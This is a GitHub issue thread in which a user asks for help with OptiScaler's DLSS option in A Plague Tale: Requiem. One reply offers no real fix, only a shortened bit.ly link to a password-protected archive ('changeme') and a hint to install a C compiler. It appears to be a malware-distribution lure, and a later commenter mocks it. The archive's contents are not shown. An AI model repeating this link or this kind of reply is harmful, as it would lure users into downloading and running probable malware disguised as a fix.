### ISSUE TITLE
in the game A Plague Tale Requiem - Windows

### ISSUE THREAD

**Issue by VelasquezZZ12** [cdozdil/OptiScaler#57]
I tried to install it but when I activate the dlss option it disappears, how can I solve this?
![A Plague Tale_ Requiem - Windows 28_09_2024 22_34_21](https://github.com/user-attachments/assets/02407f70-263f-49e1-9547-c00287a52c6d)
![A Plague Tale_ Requiem - Windows 28_09_2024 22_34_28](https://github.com/user-attachments/assets/6e7b24f2-beb1-4086-bd8b-8cd958e812bd)

**Comment by SagarChandra07** [comment]
I think this will help you.
https://bit.ly/47P0Nvo
Archive password: changeme

you may need to install the c compiler

**Comment by VelasquezZZ12** [comment]
> Acho que isso vai te ajudar. https://bit.ly/47P0Nvo Senha do arquivo: changeme
> 
> você pode precisar instalar o compilador c

asked for password to use

**Comment by TheDarkgg** [comment]
Thanks for the fix! 👎
